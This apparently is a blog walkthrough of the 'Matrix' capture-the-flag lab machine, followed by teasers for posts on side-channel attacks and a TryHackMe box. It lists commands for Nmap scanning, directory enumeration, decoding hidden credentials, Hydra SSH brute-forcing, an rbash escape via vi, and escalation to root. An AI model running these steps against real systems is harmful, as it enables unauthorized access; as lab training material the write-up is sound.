MATRIX

 Hello, welcome all, we are here for a walkthrough on matrix machine. Lets roll on and capture the flag. 

Summary of the steps

The summary of the steps involved in solving this CTF is given below.

   1, Identifying target host by using the Nmap utility

   2, Scanning open ports by using the Nmap scanner

   3, Learning more about the target system with HTML comments

   4, Identifying and downloading hidden files

   5, Generating a password list with wordlist

   6, Brute-forcing with Hydra

   7, Logging in and bypassing Rbash shell

   8, Taking root access

   9, Reading flag file

Step-1

* First open terminal and run "ifconfig" command, copy the IP and move to next step



Step-2

switch to root user by running "sudo su" command

* Take IP and scan using Nmap run;

  ⇒ nmap -sn IP.0/24

* For aggressive scanning run;

 ⇒ nmap -A -v IP

Step-3

* Copy that IP and search it on your browser, and a new page opens then;


                                            right click ➡ view page source;



we can't find any clues from the html comments, so copy the IP from the search bar eg;(https//192.168.29.121/ ), then come back to our terminal and run

 ⇒ dirb IP  (eg; https//192.168.29.121/ )


Copy https://192.168.29.225/assets (CODE: 301| SIZE:0) and search it on your browser, then we get a new page;

In these files open img/ and then open port31337.png file here we can see an image of rabbit;

Open browser and search IP with the port no, that we find (eg; 192.168.29.225:31337/ ) then you will get into a new window like this;



                 Here right click  view source page
Then scroll down we get a hash value, copy that and decode it on any website; (eg: base64)




After decoding that hash value, we get; echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix


Open terminal and run;

 ⇒ echo "hash value" | base64 -d


Step-4

Go to browser and search;
 ⇒ 192.168.29.225:31337/Cypher.matrix 
And download the file, then run these commands

 ⇒ cd Downloads

 ⇒ ls

 ⇒ cat cypher.matrix

Now we get some charecters in an encrypted form, go to any website and decrypt that text.


After decrypting we get a form of password: k1ll0rXX

Step-5

Now we are going to creating a wordlist of passwords, run command; after entering into the Downloads directory

ls

⇒ cat wordlist



Step-6

Using hydra we are going to do a brute force attack, run;

⇒ hydra -l guest -P wordlist 192.168.29.225 ssh


We get the username and password as guest,k1ll0r7n

Step-7

We are logging into the machine using command;

⇒ ssh guest@192.168.29.225
⇒ password: k1ll0r7n

Step-8

After that, we going to take the root access;

⇒ echo $PATH

⇒ echo /home/guest/prog

⇒ echo /home/guest/prog/*

⇒ vi


⇒ :!/bin/bash

⇒ echo $SHELL

⇒ export SHELL=/bin/bash:$SHELL

⇒ ls

⇒ export PATH=/usr/bin:$PATH

⇒ echo $PATH

⇒ sudo su

⇒ cd /root

Step-9

Reading flag/capture the flag

⇒ ls
⇒cat flag.txt




Comments

Post a Comment

Popular posts from this blog

SIDE-CHANNEL ATTACK (SCA)

Image
  Imagine that a robber wants to break into your house, not necessarily he has to break the lock and come inside. he may break the hinges of the door and break-in. Like this attackers use a similar concept to break a cryptosystem through side-Channel attack. Come on let's go through the topic Side-Channel Attack  what is a side-channel attack ? Introduction   A side-channel attack (SCA) is a security exploit that attempts to extract secrets from a chip or a system by measuring or analyzing various parameters. Such as: timing information, power consumption, electromagnetic leaks Or we can say that   "side-channel attacks are based on side-channel information" A side-channel attack may also be referred to as a sidebar attack or an implementation attack. These attacks pose a serious threat to modules that integrate cryptographic system. How does a SCA work? * A side-channel attack doesn't target a program or its code directly. *  It attempts to gathe...
Read more

TryHackMe - Overpass

Image
   Overpass Hello guys, welcome    back again! with another walkthrough this time   we're moving through a box called "overpass" from TryHackMe . Come on guys, let's move to the TryHackme website, login with your  credentials then go to the learn option there search for "Overpass" select it and join the room. Before starting the machine you need to establish a connection with TryHackMe server using an openvpn. For that you click on  the profile avatar ➡ Access  ➡  Download my configuration file. Next you need to open your terminal and run these cmds: ➡ ls ➡ cd Downloads ➡ ls ➡ sudo openvpn (filename) Now our ovpn connected successfully. Go back to THM website and select ' start machine ', you will get an IP copy that IP and open new terminal switch to root user by using cmd: sudo su. Scanning & Enumeration:    ➡ ping 10.10.137.248     ➡  nmap -A  10.10.137.248 After aggressive scanning we get that, port 22 ...
Read more